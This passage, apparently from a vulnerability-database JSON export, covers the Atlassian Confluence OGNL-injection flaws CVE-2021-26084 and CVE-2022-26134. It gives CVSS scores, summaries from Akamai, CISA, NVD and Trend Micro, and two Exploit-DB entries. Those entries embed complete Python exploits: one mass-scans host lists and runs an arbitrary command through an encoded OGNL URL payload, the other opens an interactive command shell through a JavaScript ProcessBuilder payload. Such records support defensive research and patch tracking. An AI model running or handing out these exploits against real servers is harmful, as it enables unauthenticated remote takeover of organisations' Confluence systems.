Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-06-14T17:05:44", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) that's affecting Confluence Server and Data Center products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:00:00", "type": "akamaiblog", "title": "Akamai Protects Against the Atlassian Confluence 0-Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T09:00:00", "id": "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "href": "https://www.akamai.com/blog/security/akamai-protects-against-atlassian-confluence-0-day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T15:05:44", "description": "The Atlassian Confluence vulnerability is here to stay. 
See Akamai's research into the stats two weeks after the advisory was released.", "cvss3": {}, "published": "2022-06-28T13:00:00", "type": "akamaiblog", "title": "Akamai's Observations of Confluence Zero Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-28T13:00:00", "id": "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "href": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": 
"2021-09-15T07:00:00", "id": "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection--cve-2021-26084---how-a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": 
"2022-08-10T17:26:47", "description": "Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA-KEV-CVE-2022-26134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 contains an OGNL injection vulnerability which allows an attacker to execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server < 6.13.23, 6.14.0 - 7.12.5 Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-30T10:42:46", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. 
The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T22:15:00", "type": "cve", "title": "CVE-2022-26134", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T06:15:00", "cpe": ["cpe:/a:atlassian:confluence_data_center:7.18.0", "cpe:/a:atlassian:confluence_server:7.18.0"], "id": "CVE-2022-26134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-10T17:24:19", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center 
instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-06-10T14:26:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "trendmicroblog": [{"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, 
"cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-03T11:59:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "exploitdb", "title": "Confluence Data Center 7.18.0 - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-26134", "CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "EDB-ID:50952", "href": "https://www.exploit-db.com/exploits/50952", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\r\n# Google Dork: N/A\r\n# Date: 06/006/2022\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.4.17 versions before 7.18.1\r\n# Tested on: -\r\n# CVE : CVE-2022-26134\r\n# https://github.com/h3v0x/CVE-2022-26134\r\n\r\n#!/usr/bin/python3\r\n\r\nimport sys\r\nimport requests\r\nimport optparse\r\nimport multiprocessing\r\n\r\nfrom requests.packages import urllib3\r\nfrom requests.exceptions import MissingSchema, InvalidURL\r\nurllib3.disable_warnings()\r\n\r\nrequestEngine = multiprocessing.Manager()\r\nsession = requests.Session()\r\n\r\nglobal paramResults\r\nparamResults = requestEngine.list()\r\nglobals().update(locals())\r\n\r\ndef spiderXpl(url):\r\n globals().update(locals())\r\n if not 
url.startswith('http'):\r\n url='http://'+url\r\n \r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\r\n \"Connection\": \"close\",\r\n \"Accept-Encoding\": \"gzip, deflate\"}\r\n\r\n try:\r\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\r\n if(response.status_code == 302):\r\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\r\n\r\n inputBuffer = str(response.headers['X-Cmd-Response'])\r\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\r\n else:\r\n pass\r\n\r\n except requests.exceptions.ConnectionError:\r\n print('[x] Failed to Connect: '+url)\r\n pass\r\n except multiprocessing.log_to_stderr:\r\n pass\r\n except KeyboardInterrupt:\r\n print('[!] Stoping exploit...')\r\n exit(0)\r\n except (MissingSchema, InvalidURL):\r\n pass\r\n \r\n \r\ndef banner():\r\n print('[-] CVE-2022-26134')\r\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\r\n\r\n \r\ndef main():\r\n banner()\r\n \r\n globals().update(locals())\r\n \r\n sys.setrecursionlimit(100000)\r\n\r\n if not optionsOpt.filehosts:\r\n url = optionsOpt.url\r\n spiderXpl(url)\r\n else:\r\n f = open(optionsOpt.filehosts)\r\n urls = map(str.strip, f.readlines())\r\n\r\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\r\n try:\r\n multiReq.map(spiderXpl, urls)\r\n multiReq.close()\r\n multiReq.join()\r\n except UnboundLocalError:\r\n pass\r\n except KeyboardInterrupt:\r\n exit(0)\r\n\r\n\r\n if optionsOpt.output:\r\n print(\"\\n[!] 
Saving the output result in: %s\" % optionsOpt.output)\r\n\r\n with open(optionsOpt.output, \"w\") as f:\r\n for result in paramResults:\r\n f.write(\"%s\\n\" % result)\r\n f.close()\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n\r\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\r\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\r\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\r\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\r\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\r\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\r\n optionsOpt, args = parser.parse_args()\r\n\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-07T06:05:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "exploitdb", "title": "Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26084", "CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "EDB-ID:50243", "href": "https://www.exploit-db.com/exploits/50243", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 01/09/2021\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.12.x versions before 7.12.5\r\n# Tested on: Linux Distros \r\n# CVE : CVE-2021-26084\r\n\r\n#!/usr/bin/python3\r\n\r\n# References: \r\n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\r\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport optparse\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\r\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\r\n\r\noptions, args = parser.parse_args()\r\nsession = requests.Session()\r\n\r\nurl_vuln = options.url\r\nendpoint = options.path\r\n\r\nif not options.url or not options.path:\r\n\r\n print('[+] Specify an url target')\r\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\r\n print('[+] Example help usage: exploit.py -h')\r\n exit()\r\n\r\n\r\ndef banner():\r\n\r\n print('---------------------------------------------------------------')\r\n print('[-] Confluence Server Webwork OGNL injection')\r\n print('[-] CVE-2021-26084')\r\n print('[-] https://github.com/h3v0x')\r\n 
print('--------------------------------------------------------------- \\n')\r\n\r\n\r\ndef cmdExec():\r\n\r\n while True:\r\n cmd = input('> ')\r\n xpl_url = url_vuln + endpoint\r\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\r\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\r\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\r\n\r\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\r\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\r\n print(queryStringValue)\r\n\r\n\r\nbanner()\r\ncmdExec()", "sourceHref": "https://www.exploit-db.com/download/50243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-07-06T14:56:26", "description": "Hello everyone! 
